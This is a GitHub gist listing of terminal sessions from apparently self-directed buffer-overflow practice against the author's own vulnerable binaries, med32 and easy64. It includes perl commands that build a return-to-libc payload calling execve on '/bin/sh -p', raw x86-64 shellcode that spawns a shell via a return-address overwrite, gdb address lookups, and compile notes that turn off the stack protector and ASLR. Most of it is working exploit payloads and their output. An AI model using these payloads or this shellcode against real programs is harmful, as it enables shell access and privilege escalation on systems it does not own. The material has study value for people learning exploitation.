fgsahoward’s gists

fgsahoward / med32_debugging3

Created June 11, 2018 17:29

	[howard@sterling bof]$ perl -e 'print "A"x0x408, "B"x4, "\xc0\xc7\xea\xf7", "C"x4, "\x46\xdc\xff\xff", "\xb8\xda\xff\xff", "c4\xda\xff\xff"' > exp
	[howard@sterling bof]$ gdb -q med32
	Reading symbols from med32...(no debugging symbols found)...done.
	(gdb) r /bin/sh -p <exp
	Starting program: /home/howard/repos/bof/med32 /bin/sh -p <exp
	Enter some text: Your string:
	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

fgsahoward / med32_debugging2

Created June 11, 2018 17:27

	[howard@sterling bof]$ gdb -q med32
	Reading symbols from med32...(no debugging symbols found)...done.
	(gdb) b *main
	Breakpoint 1 at 0x8048504
	(gdb) r /bin/sh -p
	Starting program: /home/howard/repos/bof/med32 /bin/sh -p

	Breakpoint 1, 0x08048504 in main ()
	(gdb) x/xw $esp
	0xffffda1c: 0xf7e12196

fgsahoward / med32_debugging1

Created June 11, 2018 17:26

	[howard@sterling bof]$ gdb -q ./med32
	Reading symbols from ./med32...(no debugging symbols found)...done.
	(gdb) b *main
	Breakpoint 1 at 0x8048504
	(gdb) r
	Starting program: /home/howard/repos/bof/med32

	Breakpoint 1, 0x08048504 in main ()
	(gdb) x/i 0xf7eac7c0
	0xf7eac7c0 <execve>: push %ebx

fgsahoward / med.c

Created June 11, 2018 17:24

	/**
	* Compile:
	* 32-bit:
	* gcc -o med32 -m32 -fno-stack-protector med.c
	* 64-bit:
	* gcc -o med64 -fno-stack-protector med.c
	*
	* Turn off ASLR:
	* sudo systctl -w kernel.randomize_va_space=0
	**/

fgsahoward / examining_libc_symbols

Created June 11, 2018 17:23

	[howard@sterling bof]$ nm /usr/lib32/libc.so.6 \| grep execve
	000b27c0 W execve
	000b27c0 t __execve
	000b27f0 T fexecve
	000b27c0 t __GI_execve
	000b27c0 t __GI___execve

fgsahoward / examining_binary_so_dependencies

Created June 11, 2018 17:21

fgsahoward / examining_process_memory_regions

Created June 11, 2018 17:17

	[howard@sterling bof]$ pidof cat
	16604
	[howard@sterling bof]$ cat /proc/16604/maps
	00400000-0040c000 r-xp 00000000 08:02 2893873 /usr/bin/cat
	0060b000-0060c000 r--p 0000b000 08:02 2893873 /usr/bin/cat
	0060c000-0060d000 rw-p 0000c000 08:02 2893873 /usr/bin/cat
	0060d000-0062e000 rw-p 00000000 00:00 0 [heap]
	7ffff785b000-7ffff7a3c000 r--p 00000000 08:02 2905881 /usr/lib/locale/locale-archive
	7ffff7a3c000-7ffff7bd1000 r-xp 00000000 08:02 2886815 /usr/lib/libc-2.24.so
	7ffff7bd1000-7ffff7dd0000 ---p 00195000 08:02 2886815 /usr/lib/libc-2.24.so

fgsahoward / easy64_debugging3

Created June 11, 2018 15:42

	[howard@sterling shellcodes]$ perl -e 'print "\x48\x31\xff\x57\xeb\x34\x4c\x8b\x04\x24\x4d\x31\xc9\x41\xb1\x41\x45\x30\x48\x07\x4c\x89\xc7\x4c\x8b\x44\x24\x08\x4d\x31\x48\x02\x48\x89\xe6\x48\x31\xd2\x48\x31\xc0\xb0\x3b\x0f\x05\xe8\xd4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\xe8\xee\xff\xff\xff\x2d\x70\x41", "A"x0x3c6, "\x10\xe0\xff\xff\xff\x7f"' > input
	[howard@sterling shellcodes]$ /home/howard/repos/bof/easy64 "$(cat input)"
	Input: H1�W�4L�$M1�A�AE0HL��L�DM1HH��H1�H1��;��/bin/shA��-pAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

fgsahoward / easy64_debugging2

Created June 11, 2018 15:41

	[howard@sterling shellcodes]$ perl -e 'print "\x48\x31\xff\x57\xeb\x34\x4c\x8b\x04\x24\x4d\x31\xc9\x41\xb1\x41\x45\x30\x48\x07\x4c\x89\xc7\x4c\x8b\x44\x24\x08\x4d\x31\x48\x02\x48\x89\xe6\x48\x31\xd2\x48\x31\xc0\xb0\x3b\x0f\x05\xe8\xd4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\xe8\xee\xff\xff\xff\x2d\x70\x41", "A"x0x3c6, "\x20\xe0\xff\xff\xff\x7f"' > input
	[howard@sterling shellcodes]$ gdb -q ../easy64
	Reading symbols from ../easy64...(no debugging symbols found)...done.
	(gdb) r "$(cat input)"
	Starting program: /home/howard/repos/bof/easy64 "$(cat input)"
	Input: H1�W�4L�$M1�A�AE0HL��L�DM1HH��H1�H1��;��/bin/shA��-pAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

fgsahoward / easy64_debugging1

Created June 11, 2018 15:40

	[howard@sterling shellcodes]$ cat shell3_64.sc
	\x48\x31\xff\x57\xeb\x34\x4c\x8b\x04\x24\x4d\x31\xc9\x41\xb1\x41\x45\x30\x48\x07\x4c\x89\xc7\x4c\x8b\x44\x24\x08\x4d\x31\x48\x02\x48\x89\xe6\x48\x31\xd2\x48\x31\xc0\xb0\x3b\x0f\x05\xe8\xd4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\xe8\xee\xff\xff\xff\x2d\x70\x41
	[howard@sterling shellcodes]$ cat shell3_64.sc \| wc -c
	265
	[howard@sterling shellcodes]$ gdb -q ../easy64
	Reading symbols from ../easy64...(no debugging symbols found)...done.
	(gdb) disas main
	Dump of assembler code for function main:
	0x00000000004005bd <+0>: push %rbp
	0x00000000004005be <+1>: mov %rsp,%rbp

Austin Howard fgsahoward